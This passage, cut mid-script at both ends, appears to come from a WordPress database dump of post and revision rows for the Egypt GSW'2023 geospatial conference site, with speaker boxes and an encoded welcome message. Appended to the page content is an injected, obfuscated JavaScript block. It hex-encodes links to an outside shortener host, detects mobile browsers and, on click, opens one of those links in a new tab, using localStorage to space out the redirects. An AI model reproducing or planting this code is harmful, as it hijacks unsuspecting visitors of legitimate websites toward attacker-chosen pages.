u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Home','','inherit','closed','closed','','2167-revision-v1','','','2022-10-05 18:03:42','2022-10-05 18:03:42','',2167,'https://gsw2023.com/?p=2299',0,'revision','',0),
(2300,1,'2022-10-05 18:06:57','2022-10-05 18:06:57','<p>[vc_row equal_height=\"yes\" content_placement=\"middle\" type=\"vc_default\" margin_top=\"5\" margin_bottom=\"10\" css=\".vc_custom_1529515723794{padding-top: 70px !important;padding-bottom: 55px !important;}\"][vc_column parallax=\"content-moving\" offset=\"vc_col-lg-offset-2 vc_col-lg-8 vc_col-md-offset-1 vc_col-md-10\"][ultimate_heading main_heading=\"Egypt GSW\'2023 -The First Geospatial Week in Africa and The Middle East\" sub_heading_color=\"#333333\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"150\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:70px;\" margin_design_tab_text=\"\"][/ultimate_heading][vc_row_inner][vc_column_inner width=\"5/12\"][bsf-info-box icon_type=\"custom\" icon_img=\"id^2271|url^https://gsw2023.com/wp-content/uploads/2022/10/dr-ismael-1.png|caption^null|alt^null|title^dr-ismael|description^null\" img_width=\"100\" title=\"Prof. Ismail AbdelGhafar\" heading_tag=\"h5\" read_more=\"box\" link=\"url:%2Fsoftware-company%2Fservices%2Fweb-application-development%2F|||\" hover_effect=\"style_2\" pos=\"top\" el_class=\"accent-icon-bg\" title_font_size=\"desktop:22px;\" title_font_line_height=\"desktop:32px;\"]</p>\n<h6><strong>President Arab Academy for Science, Technology and Maritime Transport</strong></h6>\n<p>[/bsf-info-box][/vc_column_inner][vc_column_inner width=\"1/3\"][bsf-info-box icon_type=\"custom\" icon_img=\"id^2272|url^https://gsw2023.com/wp-content/uploads/2022/10/dr-naser.jpg|caption^null|alt^null|title^dr-naser|description^null\" img_width=\"100\" icon_style=\"advanced\" icon_border_spacing=\"100\" title=\"Prof. Naser El-Sheimy\" heading_tag=\"h5\" read_more=\"box\" link=\"url:%2Fsoftware-company%2Fservices%2Fsoftware-dedicated-team%2F|||\" hover_effect=\"style_2\" pos=\"top\" el_class=\"accent-icon-bg\" title_font_size=\"desktop:22px;\" title_font_line_height=\"desktop:32px;\"]</p>\n<h6>Geospatial Week Director ,The University of Calgary</h6>\n<p>[/bsf-info-box][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row][vc_column][vc_raw_html]JTNDcCUyMHN0eWxlJTNEJTIydGV4dC1hbGlnbiUzQSUyMGp1c3RpZnklMjIlMjAlMjJjb2xvciUzRGJsYWNrJTIyJTNFQXMlMjB3ZSUyMGNlbGVicmF0ZSUyMG91ciUyMDUwdGglMjBhbm5pdmVyc2FyeSUyQyUyMHRoZSUyMEFyYWIlMjBBY2FkZW15JTIwZm9yJTIwU2NpZW5jZSUyQyUyMFRlY2hub2xvZ3klMkMlMjBhbmQlMjBNYXJpdGltZSUyMFRyYW5zcG9ydCUyMCUyOEFBU1RNVCUyOSUyMGlzJTIwaG9ub3JlZCUyMHRvJTIwaG9zdCUyMHRoZSUyMElTUFJTJTIwZmlyc3QlMjBHZW9zcGF0aWFsJTIwV2VlayUyMGluJTIwQWZyaWNhJTIwYW5kJTIwTWlkZGxlJTIwRWFzdCUyMGluJTIwMjAyMyUyMCUyOEdTVy0yMDIzJTI5JTIwdGhhdCUyMHdpbGwlMjBiZSUyMGhlbGQlMjB1bmRlciUyMHRoZSUyMGF1c3BpY2VzJTIwb2YlMjBILkUlMjBTZWNyZXRhcnktR2VuZXJhbCUyMG9mJTIwdGhlJTIwTGVhZ3VlJTIwb2YlMjBBcmFiJTIwU3RhdGVzLiUyMFRoZSUyMGNvbmZlcmVuY2UlMjB3aWxsJTIwYmUlMjBoZWxkJTIwaW4lMjBTZXB0ZW1iZXIlMjAyMDIzJTJDJTIwYXQlMjB0aGUlMjBJbnRlckNvbnRpbmVudGFsJTIwQ2Fpcm8lMjBDaXR5JTIwc3RhcnMlMjBDYWlybyUyQyUyMEVneXB0LiUyMEFBU1RNVCUyMHN0cm9uZ2x5JTIwYmVsaWV2ZXMlMjB0aGF0JTIwc2NpZW5jZSUyMGlzJTIwdGhlJTIwa2V5JTIwdG8lMjB0aGUlMjBmdXR1cmUlMjBhbmQlMjB0aGUlMjBjb3JuZXJzdG9uZSUyMGZvciUyMG5hdGlvbnMlMjclMjBwcm9ncmVzcyUyMGFuZCUyMHByb3NwZXJpdHkuJTIwSXQlMjBpcyUyMHRoZSUyMHByaW1hcnklMjBmYWN0b3IlMjBmb3IlMjBodW1hbiUyMGFjaGlldmVtZW50cyUyMHRocm91Z2hvdXQlMjBhbGwlMjBhZ2VzLiUyMEFBU1RNVCUyMGhhcyUyMGElMjBob3N0JTIwb2YlMjBxdWFsaWZpZWQlMjBwcm9mZXNzb3JzJTIwYW5kJTIwZXhwZXJ0cyUyMHdobyUyMGFyZSUyMGNhcGFibGUlMjBvZiUyMHN1cHBvcnRpbmclMjBBcmFiJTIwYW5kJTIwQWZyaWNhbiUyMGNvdW50cmllcyUyMGluJTIwdmFyaW91cyUyMHNjaWVudGlmaWMlMjBmaWVsZHMuJTIwVGhlJTIwR1NXJTIwd2lsbCUyMHByb3ZpZGUlMjBhJTIwcGxhdGZvcm0lMjBmb3IlMjBpbnRlcm5hdGlvbmFsJTIwc2Nob2xhcnMlMkMlMjBncmFkdWF0ZSUyMHN0dWRlbnRzJTJDJTIwZnV0dXJlJTIwc2NpZW50aXN0cyUyMGFuZCUyMGluZHVzdHJpYWwlMjBzZWN0b3JzJTIwdG8lMjBsZWFybiUyMGV4Y2hhbmdlJTIwa25vd2xlZGdlJTIwYW5kJTIwZXhwZXJpZW5jZXMlMjBvZiUyMGFwcGx5aW5nJTIwZ2Vvc3BhdGlhbCUyMHRlY2hub2xvZ2llcyUyMGZvciUyMHN1c3RhaW5hYmxlJTIwZGV2ZWxvcG1lbnQlMjBmb3IlMjBiZXR0ZXIlMjBxdWFsaXR5JTIwb2YlMjBsaWZlJTIwZm9yJTIwcGVvcGxlJTIwYXJvdW5kJTIwdGhlJTIwd29ybGQuJTIwV2UlMjB3b3VsZCUyMGxpa2UlMjB0byUyMHRha2UlMjB0aGlzJTIwb3Bwb3J0dW5pdHklMjB0byUyMHdlbGNvbWUlMjB5b3UlMjB0byUyMENhaXJvJTIwYSUyMHZpYnJhbnQlMkMlMjBleGhpbGFyYXRpbmclMkMlMjBleG90aWMlMkMlMjBmYXNjaW5hdGluZyUyMGFuZCUyMHdlbGNvbWluZyUyMGNpdHkuJTIwSG9tZSUyMHRvJTIwdGhlJTIwYmVzdCUyMFBoYXJhb25pYyUyQyUyMENvcHRpYyUyMGFuZCUyMElzbGFtaWMlMjBzaWdodHMlMjBpbiUyMEVneXB0LiUyMENhaXJvJTIwaXMlMjB3aGVyZSUyMHlvdSUyMG5ldmVyJTIwa25vdyUyMHdoYXQlMjBpbmNyZWRpYmxlJTJDJTIwaGFsZi1mb3Jnb3R0ZW4lMjBtb251bWVudCUyMHlvdSUyMG1pZ2h0JTIwc3R1bWJsZSUyMGFjcm9zcyUyMHdoaWxlJTIwd2FuZGVyaW5nJTIwYXJvdW5kLiUyMEVuam95JTIwdGhlJTIwTmlsZSUyMHZpZXclMkMlMjB2aXNpdCUyMHRoZSUyMGdyZWF0JTIwcHlyYW1pZHMlMjBvZiUyMEdpemElMkMlMjB3YWxrJTIwdGhyb3VnaCUyMHRoZSUyMGNhcGl0YWwlMjdzJTIwbWVkaWV2YWwlMjBtYXJrZXRzJTIwYnklMjBLaGFuJTIwRWwtS2hhbGlsaSUyQyUyMG9yJTIwd2FsayUyMGRvd24lMjB0aGUlMjBOaWxlJTIwcHJvbWVuYWRlLiUyMFdlJTIwbG9vayUyMGZvcndhcmQlMjB0byUyMHdvcmtpbmclMjB3aXRoJTIwdGhlJTIwSVNQUlMlMjBjb3VuY2lsJTJDJTIwY29tbWlzc2lvbnMlMjBwcmVzaWRlbnRzJTJDJTIwd29ya2luZyUyMGdyb3VwJTIwb2ZmaWNlcnMlMkMlMjBhbmQlMjBvdGhlciUyMHNpc3RlciUyMG9yZ2FuaXphdGlvbnMlMjB0byUyMGhhdmUlMjBhJTIwc3VjY2Vzc2Z1bCUyMHRlY2huaWNhbCUyMHByb2dyYW0lMjBhbmQlMjBhJTIwbWVtb3JhYmxlJTIwc29jaWFsJTIwcHJvZ3JhbS4lMjBJdCUyMGlzJTIwZ3JlYXQlMjB0byUyMGhhdmUlMjB0aGUlMjBHU1clMjBjb21pbmclMjB0byUyMEVneXB0JTIwd2hlcmUlMjBtb3N0JTIwcHJvYmFibHklMjB0aGUlMjBmaXJzdCUyMG1hcHBpbmclMjBzeXN0ZW1zJTIwd2VyZSUyMGRldmVsb3BlZCUyMDEwMDBzJTIweWVhcnMlMjBhZ28uJTIwV2VsY29tZSUyMHRvJTIwR1NXJTI3MjAyMyUyMGluJTIwQ2Fpcm8lMkMlMjBFZ3lwdC4lM0MlMkZwJTNF[/vc_raw_html][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1529519814966{padding-top: 40px !important;padding-bottom: 40px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #8426B0), color-stop(54%, #BD0282), color-stop(95%, #EC4B3C));background: -moz-linear-gradient(left,#8426B0 10%,#BD0282 54%,#EC4B3C 95%);background: -webkit-linear-gradient(left,#8426B0 10%,#BD0282 54%,#EC4B3C 95%);background: -o-linear-gradient(left,#8426B0 10%,#BD0282 54%,#EC4B3C 95%);background: -ms-linear-gradient(left,#8426B0 10%,#BD0282 54%,#EC4B3C 95%);background: linear-gradient(left,#8426B0 10%,#BD0282 54%,#EC4B3C 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"``The time is always right to do what is right!``\" main_heading_color=\"#ffffff\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^1900|url^https://gsw2023.com/wp-content/uploads/2018/06/trade10.jpg|caption^null|alt^null|title^trade10|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1529568771974{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"Have a project you\'d like to talk about?\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]Sed consequat erat vitae odio placerat, vel malesuada mi convallis we can help![/ultimate_heading][dt_default_button link=\"url:%2Fsoftware-company%2Fcontact%2F|||\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1529527073081{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][dt_default_button link=\"url:%2Fsoftware-company%2Fshowcase%2F|||\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1529527107907{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]VIEW SHOWCASE[/dt_default_button][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const 